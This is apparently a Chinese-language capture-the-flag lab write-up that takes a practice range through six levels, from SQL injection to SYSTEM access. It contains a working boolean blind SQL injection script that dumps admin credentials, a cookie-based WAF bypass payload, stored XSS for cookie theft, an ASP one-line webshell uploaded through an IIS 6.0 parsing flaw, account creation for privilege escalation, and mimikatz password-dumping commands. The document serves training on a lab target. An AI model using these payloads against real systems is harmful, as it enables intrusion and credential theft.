0x01 为了女神小芳!

Tips:

通过sql注入拿到管理员密码!
尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站
学过一点黑客技术的他,想在女神面前炫炫技。于是他打开了

最基础的sql盲注。

打开靶场链接,是介绍猫舍的博客文章

经过测试,id参数接收用户输入并于数据库交互。

在 and 1=2时查询不到信息,说明and被当作sql语句解析了。可以根据页面回显不同进行sql布尔盲注。

简单写了个sql布尔盲注脚本

import requests

url = "http://pu2lh35s.ia.aqlab.cn/"
result = ""
for i in range(1,100):
min = 32
max = 128
mid = (min + max) // 2 # 取中间值
while(min<max):
# payload = "?id=1 and (ascii(substr((database()),{0},1))>{1})#".format(i,mid) #数据库:maoshe
# payload = "?id=1 and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='maoshe'),{0},1))>{1})#".format(i,mid) #表:admin
# payload = "?id=1 and (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='admin' and table_schema='maoshe'),{0},1))>{1})#".format(i,mid) #表的字段:Id,username,password
payload = "?id=1 and (ascii(substr((select group_concat(username,0x3a,password) from maoshe.admin),{0},1))>{1})#".format(i,mid) #字段值:
print(url + payload)
req = requests.get(url+payload)
# print(req.text)
if "DNA" in req.text:
min = mid+1
else:
max = mid
mid = (min + max) // 2

if(chr(mid) == " "):
break
result += chr(mid)
print(result)

提示说了拿到管理员密码,在admin表中爆出password。

管理员密码就是 hellohack,第一关完成。

0x02 遇到阻难!绕过WAF过滤!

Tips:

尤里在得到女神家网站密码后,却发现注入点权限很小,凭他的皮毛技术也没找到网站后台,
这时尤里通过旁站查询,他发现了女神家网站是用的主机空间托管,
他立刻扫描旁站,果然发现一个站点,且后台是默认路径……
尤里冷笑一声行动了起来,却发现有一层防火墙拦在了他的面前。。

打开靶场链接是一个站点,扫目录得到后台登录地址

访问该后台地址,试了一波弱口令无果,有验证码,没法爆破。看来得从别的地方找突破口。

在查看企业新闻这里,也有暴露在外的参数id,并且经过测试,是与数据库有交互的

想着一以同样的方法注入,但是存在waf防护

仔细看这个警告信息,是通过弹窗实现。服务端可能做了网页防护,只是对Get,Post等请求方式进行验证。所以我们尝试在cookie字段里添加id,看是否有效果。

通过cookie提交id参数仍然具有效果,且没有waf校验。那么就可以从cookie注入这个角度绕过waf,注出后台登录的管理员账号密码。上图通过sql语句判断字段值为10个

通过联合注入,经过测试回显点有2、3、7、8、9

id=171+union+select+1,username,password,4,5,6,7,8,9,0+from+admin

貌似是通过md5加密后的,拿到cmd5在线解密网站,解密出来是welcome,再用这个账号密码进行后台登录。

登录成功后就有flag,第二关完成。

0x03 为了更多的权限!留言板!

Tips:

1、存储型Xss
2、flag在cookie里,格式为zkz{..},xss bot 每10秒访问一次页面
3、自建Xss平台源码:http://hack.zkaq.cn/?t/99.html
经过一番操作,尤里虽然进入到后台,窃窃自喜的他不满足于此,作为黑阔他要挑战曾经的自己,他要攻克之前失手的网站!
他重新浏览之前的网站,这时他突然发现了一个留言板功能。而留言板管理员是每天都会去查阅的。
尤里开始动手……

打开靶场链接也是同样的站点,该站点有留言和查看留言两种功能,猜测这里可能就会存在XSS,对必填的表单都写入javascript 代码

提交留言后弹窗为1,那么存在xss的地方就在填写主题这里,并且该站点会保留我们的留言,当我们查看留言时,就会出现弹窗,说明这是存储型的XSS。上面提示说了,管理员每天都会查看留言,我们可以写入一段恶意的javascript代码,当管理员查看时,能够获取管理员的cookie进行未授权登录。

使用在线XSS平台

插入这段恶意代码后等待几分钟,在XSS平台上接收到了管理员的cookie。

找到flag,第三关完成。

0x04 进击!拿到Web最高权限!

Tips:

1、通过修改Cookie登录后台(没用重打) 2、上传SHELL!3、Flag在web根目录(flag.php) 3.上传图片时建议上传小文件,我建议用QQ表情
尤里通过XSS终于得到了管理员Cookie,在修改了cookie后尤里直接绕过了登录密码,看到了后台功能!
接下来要做的,就是找一个上传点,上传自己的shell了!

用上一关拿到的管理员cookie直接登录后台

在产品管理的地方找到一处文件上传点

该站点使用的是asp,所以百度asp的一句话木马。

<%eval request ("pass")%>

其次站点限制了上传文件格式

所以可以拿一个png图片来做一个图片马。

上传图片马后用菜刀连接失败。这是因为jpg文件不解析,因为你的后缀是图片格式,所以服务器会当做一张图片去读取,而不是代码,报错信息里面写了iis6.0的中间件

百度iis6.0中间件存在文件解析漏洞

*.asp;.xxx,像这样的文件IIS会把它当作xxx.asp文件执行而不会看分号后边的内容。

以.asp命名的文件夹中的文件都会被当作asp文件执行。

将扩展名为.asp的文件解析为asp外,还默认将扩展名为.asa、.cdx、.cer解析为asp

那么将图片马的后缀名修改为cer,再进行上传

上传成功,用菜刀连接webshell

成功找到这一关的flag。

0x05 SYSTEM!POWER!

Tips:

1、提权!
2、FLAG在C盘根目录下!
尤里嘿嘿笑了起来,简单的Win2003,只要拿到SYSTEM权限,他就可以向女神小芳炫技去了。。

在菜刀开启虚拟终端,输入命令发现拒绝访问

这是因为命令提示符是在C盘,但是C盘的文件是拒绝访问的,对于我们有权限的是D盘。那么我们可以在D盘上传一个cmd。在06\UploadFile文件夹目录下有cmd.exe,在此目录下可以执行windows系统命令。

这一关的flag在C盘的根目录下,但是没有权限打开,所以需要提权。

当我们添加用户时,仍然拒绝访问

使用cmd需要用到外部接口wscript.shell。但是wscript.shell仍然在C盘,C盘我们仍然无法访问。这可怎么办?那么就只能再上传一个已经组装好的wscript.shell,也就是下图的iis6.exe

把它放到与cmd.exe可执行文件的同级目录下,用iis6.exe去运行命令

意思就是利用这个组件执行命令可以获得system的最高权限。接下来就用这个组件来添加系统账户。

接下来查看123账户的信息

还是在普通用户组,然后向管理员组添加123用户。

那么我们可以开启远程桌面,去连接靶机服务器,然后用123这个账户去登录。

网站给的地址是个域名,使用nslookup查找真实ip

开始远程登录,使用ip+3389端口,账号密码:123/123,登录成功

在C盘的根目录成功打开flag文件,第五关完成。

0x06 GET THE PASS!

Tips:

FLAG{管理员密码}
拿到SYSTEM之后,尤里并不满足,他准备通过某种方式拿到服务器管理员密码,用来收集密码信息,以便其他方向的渗透,顺便想将密码发给小芳,用以炫技。
却不曾想,当尤里看到系统的明文密码后。。大吃一惊。。。自此,尤里的人生掀开了新的篇章

信息收集,翻翻有什么可用的文件

这文件看着就很可疑。但是这个txt打不开,应该是权限设置问题

修改完权限就可以打开了

这里我们要密码获取工具[mimikatz]

这个靶场里面有

使用命令

privilege::debuug ----提升权限
sekurlsa::logonPasswords----获取登陆用户密码

获得管理员的登录密码为 wow!yougotit! ,然后再解压压缩包

成功打开文件,管理员的登录密码就是第六关的flag。